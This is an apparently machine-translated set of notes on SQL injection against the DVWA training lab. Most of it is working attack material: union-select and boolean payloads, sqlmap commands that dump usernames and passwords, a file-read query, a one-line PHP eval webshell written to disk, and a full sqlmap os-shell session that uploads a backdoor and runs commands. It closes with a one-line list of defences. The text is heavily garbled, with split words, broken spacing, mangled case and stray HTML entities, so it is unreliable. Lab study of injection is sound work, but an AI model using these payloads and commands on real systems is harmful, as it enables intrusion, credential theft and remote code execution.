Splicing SQL command Query data
annotations are commonly used in SQL injection# single-line comment Note: URL encoding%23--two minus plus space line comment/* * * * Note a region notice! In cases where SQL injection encounters single quotation marks being translated, the use of hex encoding to bypass single quotation marks can be used to inject test poc1 or 1=11 ' or ' 1=11 "or" 1=1
SQL injection UsageView form fields (number of columns) using the binary order by column number sort
determining the Echo PointXXX ' Union select 1,2;http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx ' +union+select+1,2--+&submit=submit #
View database version storage directoryHttp://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx ' [email protected] @version, @ @datadir--+&submit=submit#
querying the database user name and database nameSelect User (), database ();
python sqlmap.py-U "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"-P "id"--cookie "phpsessid= 688ktp48da80a4k0fi2ih64814;security=low "--current-user--current-db
View Table nameSelect table_name from information_schema.tables where table_schema= ' Dvwa '; http://192.168.3.88/dvwa/vulnerabilities /sqli/?id=xx ' +union+select+1,table_name+from+information_schema.tables+where+table_schema= ' dvwa '--+&Submit =submit#
python sqlmap.py-U "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"-P "id"--cookie "phpsessid= 688ktp48da80a4k0fi2ih64814;security=low "-D dvwa--tables
View column namesSelect column_name from Information_schema.columns where table_name= ' users '; http://192.168.3.88/dvwa/ Vulnerabilities/sqli/?id=xx ' +union+select+1,column_name from Information_schema.columns where table_name= ' users '-- +&submit=submit#
python sqlmap.py-U "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"-P "id"--cookie "phpsessid= 688ktp48da80a4k0fi2ih64814;security=low "-D dvwa-t users--columns
query user name passwordSelect User,password from users;http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx ' +union+select User,password From users--+&submit=submit#
python sqlmap.py-U "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"-P "id"--cookie "phpsessid= 688ktp48da80a4k0fi2ih64814;security=low "-D dvwa-t users-c" User,password "--dump file read select Load_file (' c:\\windows\\ Win.ini '); write a sentence webshellselect "<?php @eval ($_get[' cmd ');? > "Into outfile ' c:\\phpstudy\\www\\dvwa\\ttt.php ';
python sqlmap.py-U "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"-P "id"--cookie "phpsessid= 688ktp48da80a4k0fi2ih64814;security=low "-D dvwa-t users-c" User,password "--os-shell
___ __h__ ___ ___[']_____ ___ ___ {1.1.4.16#dev}|_-|. ['] |. ' | . || ___|_ [(]_|_|_|__,| _| |_| v |_| http://sqlmap.org [!] legal disclaimer:usage of Sqlmap for Attac King targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and is not responsible for any misuse or damage caused by this program [*] starting a T 09:42:39 [09:42:39] [info] resuming back-end DBMS ' MySQL ' [09:42:39] [INFO] Testing connection to the target URLSQLM AP resumed the following injection point (s) from stored session:---parameter:id (GET) type:boolean-based BL ind Title:or boolean-based blind-where OR have clause (MySQL comment) (not) payload:id=1 ' OR not 1977=1977#&SUBMIT=SUBMit type:error-based title:mysql >= 5.0 and Error-based-where, have, ORDER by or G Roup by clause (floor) payload:id=1 ' and (select 3539 from (select COUNT (*), CONCAT (0x716a767171, (Select) (ELT ( 3539=3539,1)), 0x7178767171,floor (RAND (0))) x from INFORMATION_SCHEMA. PLUGINS GROUP by X) a)--fxcd&submit=submit type:and/or time-based blind Title:mysql >= 5.0.12 and time-based blind payload:id=1 ' and SLEEP (5)--peqj&submit=submit TYP E:union query Title:mysql Union query (NULL)-2 columns payload:id=1 ' UNION ALL SELECT NULL, CONCAT (0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862, 0x7178767171) #&submit=submit---[09:42:39] [INFO] The back-end DBMS is mysqlweb server operating System:windowsweb AP Plication technology:php 5.4.45, Apache 2.4.23back-end dbms:mysql >= 5.0[09:42:39] [INFO]Going to use a Web backdoor for command prompt[09:42:39] [INFO] fingerprinting the back-end DBMS operating system[09:42:39 ] [INFO] The Back-end DBMS operating system is Windowswhich Web application language does the Web server? [1] ASP (default) [2] aspx[3] jsp[4] php> 4do want Sqlmap to further try to provoke the full path disclosure? [y/n] n[09:42:43] [WARNING] Unable to automatically retrieve the Web server document Rootwhat does you want to use for Writa ble directory? [1] Common location (s) (' c:/xampp/htdocs/, c:/wamp/www/, c:/inetpub/wwwroot/') (default) [2] custom location (s) [3] Custom directory list file[4] Brute force search> 2please provide a comma separate list of absolute directory Paths:c: \PHPSTUDY\WWW\DVWA[09:42:51] [WARNING] Unable to automatically parse any Web server path[09:42:51] [INFO] trying to upload The file stager on ' c:/phpstudy/www/dvwa/' via LIMIT ' LINES TERMINATED by ' method[09:42:51] [INFO] Heuristics detected we b page CharSet ' ASCII ' [09:42:51][INFO] The file stager have been successfully uploaded on ' c:/phpstudy/www/dvwa/'- http://192.168.3.88:80/dvwa/ TMPUMMKL.PHP[09:42:52] [INFO] The backdoor have been successfully uploaded on ' c:/phpstudy/www/dvwa/'- http:// 192.168.3.88:80/DVWA/TMPBHBMV.PHP[09:42:52] [INFO] calling OS shell. To quit type ' x ' or ' Q ' and press enteros-shell> Dirdo do want to retrieve the command standard output? [y/n/a] y[09:42:56] [INFO] Heuristics Detected Web page charset ' GB2312 ' command standard output:---The volume in drive C is Bootcamp&nbs p; The volume's serial number is D89B-813F&NBSP;&NBSP;C:\PHPSTUDY\WWW\DVWA's directory 2017-05-16 09:42 <DIR> .2017-05-16 09:42 <DIR> .. 2015-10-05 15:51 500 .htaccess2015-10-05 15:51 &N Bsp 3,845 about.php2015-10-05 15:51 &NBSp;7,229 changelog.md2017-04-25 09:18 <DIR> config2015-10-05& nbsp 15:51 33,107 copying.txt2017-04-25 09:18 <DIR> &N Bsp docs2017-04-25 09:18 <DIR> DVWA2017-04-25 09:18 <DIR> external2015-10-05 15:51 &NBSP ; 1,406 favicon.ico2017-04-25 09:18 <DIR> &N Bsp hackable2015-10-05 15:51 895 ids_log.php2015-10-05 15:51 4,389 index.php2015-10-05 15:51 &NBS P 1,869 instructions.php2015-10-05 15:51 3,522 login.php2015-10-05 15:51 414 logout.php2015-10-05 15:51 &NBSP ; 148 php.ini2015-10-05 15:51 199 PHP info.php2015-10-05 15:51 7,651 readme.md2015-10-05 15:51 robots.txt2015-10-05 15:51 &NB Sp 4,686 security.php2015-10-05 15:51 2,364 setup.php2017-05-04 20:59 466 test.php2017-05-16 09:42 908 tmpbhbmv.php2017-05-16 09:42 & nbsp 727 tmpummkl.php2017-05-15 21:11 TTT.P hp2017-04-25 09:18 <DIR> vulnerabilities 20 files 74,380 byte 8 directory 18,391,883,776 Available Bytes---OS -shell> x[09:43:02] [INFO] Cleaning up the Web files uploaded[09:43:02] [WARNING] HTTP error codes detected during run: 404 (Not Found)-2 times[09:43:02] [INFO] fetched data logged to text files under ' C:\Users\zptxwd\.sqlmap\output\192.168 .3.88 ' [*] shutting down at 09:43:03
Sqlmap tool automatically injects Lowpython sqlmap.py-u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"-P "id" --cookie "Phpsessid=1r06imrpmtlhgg7magi3oos273;security=low" medium. Attention! Use of hex encoding to bypass single quotation marks when SQL injection encounters single quote translation
DVWANormal business logic: find information within the database based on user ID and echo back to Web page select Firstname,surname from XXX where user_id= '
LowUse the 1 ' or ' 1=1 test to find a viable Python sqlmap.py-u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"-P "id "--cookie" Phpsessid=1r06imrpmtlhgg7magi3oos273;security=low "medium. Change the package to modify the post parameter 1 or 1=1
python sqlmap.py-U "http://192.168.3.88/dvwa/vulnerabilities/sqli/"--data "Id=1&submit=submit"-P "id"--cookie "phpsessid= 688ktp48da80a4k0fi2ih64814;security=medium "python sqlmap.py-u" http://192.168.3.88/dvwa/vulnerabilities/sqli/"-- Data "Id=1&submit=submit"-P "id"--cookie "phpsessid=688ktp48da80a4k0fi2ih64814;security=medium"-D dvwa-t users- C "User,password"--dump high can find query location inconsistent with echo location python sqlmap.py-u "http://192.168.3.88/dvwa/vulnerabilities/sqli/"-- Data "Id=1&submit=submit"-P "id"--cookie "phpsessid=dv9h9urfu9bf9udkd7ih6qdbj3;security=high"--second-order " http://192.168.3.88/dvwa/vulnerabilities/sqli/session-input.php# "Preventing SQL injection: Detecting ID data types, precompiled binding ID variables using precompilation, stored procedures
SQL Echo Injection-notes